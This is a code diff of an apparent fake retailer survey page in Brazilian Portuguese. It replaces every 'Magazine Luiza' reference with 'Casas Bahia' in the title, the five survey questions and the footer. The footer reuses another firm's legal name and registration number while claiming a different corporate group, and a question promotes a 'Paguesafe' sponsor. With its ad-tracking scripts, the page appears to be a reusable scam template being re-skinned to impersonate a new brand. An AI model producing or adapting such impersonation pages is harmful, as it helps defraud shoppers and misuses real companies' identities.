--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <html lang="pt-br"><head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
-  <title>Magazine Luiza</title>
+  <title>Casas Bahia</title>
   <script async="" src="js/fbevents.js"></script><script async="" src="js/fbevents_1.js"></script><script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
   <script>
     window.googlePixelId = "";
@@ -77,7 +77,7 @@
     <link rel="icon" href="responda.html" type="image/x-icon">
     <link rel="apple-touch-icon" sizes="180x180" href="responda.html">
     <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200">
-    <title>Magazine Luiza</title>
+    <title>Casas Bahia</title>
 </head>
 <body>
     <div class="content">
@@ -135,7 +135,7 @@
         </div>
 
         <div class="pergunta" id="p1">
-            <p class="pergunta_title">Como você avaliaria a experiência de compra no Magazine Luiza em termos de facilidade de uso do site ou aplicativo?</p>
+            <p class="pergunta_title">Como você avaliaria a experiência de compra no Casas Bahia em termos de facilidade de uso do site ou aplicativo?</p>
             <div class="radio-container altcontainer">
                 <label class="radiocontainer">
                    Muito fácil
@@ -166,7 +166,7 @@
             <div style="padding-bottom: 20px;"></div>
         </div>
         <div class="pergunta" id="p2" style="display: none">
-            <p class="pergunta_title">Qual é a sua opinião sobre a variedade de produtos disponíveis no Magazine Luiza?</p>
+            <p class="pergunta_title">Qual é a sua opinião sobre a variedade de produtos disponíveis no Casas Bahia?</p>
             <div class="radio-container altcontainer">
                 <label class="radiocontainer">
                    Excelente
@@ -197,7 +197,7 @@
             <div style="padding-bottom: 20px;"></div>
         </div>
         <div class="pergunta" id="p3" style="display: none">
-            <p class="pergunta_title">Como você classificaria a eficiência da entrega dos produtos comprados no Magazine Luiza?</p>
+            <p class="pergunta_title">Como você classificaria a eficiência da entrega dos produtos comprados no Casas Bahia?</p>
             <div class="radio-container altcontainer">
                 <label class="radiocontainer">
                    Rápida
@@ -228,7 +228,7 @@
             <div style="padding-bottom: 20px;"></div>
         </div>
         <div class="pergunta" id="p4" style="display: none">
-            <p class="pergunta_title">Em relação ao atendimento ao cliente do Magazine Luiza, como você o descreveria?</p>
+            <p class="pergunta_title">Em relação ao atendimento ao cliente do Casas Bahia, como você o descreveria?</p>
             <div class="radio-container altcontainer">
                 <label class="radiocontainer">
                    Excelente
@@ -259,7 +259,7 @@
             <div style="padding-bottom: 20px;"></div>
         </div>
         <div class="pergunta" id="p5" style="display: none">
-            <p class="pergunta_title">Qual o maior patrocinador do aniversário do Magazine Luiza</p>
+            <p class="pergunta_title">Qual o maior patrocinador do aniversário do Casas Bahia</p>
             <div class="radio-container altcontainer">
                 <label class="radiocontainer">
                    Paguesafe
@@ -289,7 +289,7 @@
     </div>
 
     <footer class="footer">
-        <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px; color: antiquewhite;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Magazine Luiza.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
+        <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px; color: antiquewhite;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Casas Bahia.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
     </footer>
 
     <script>
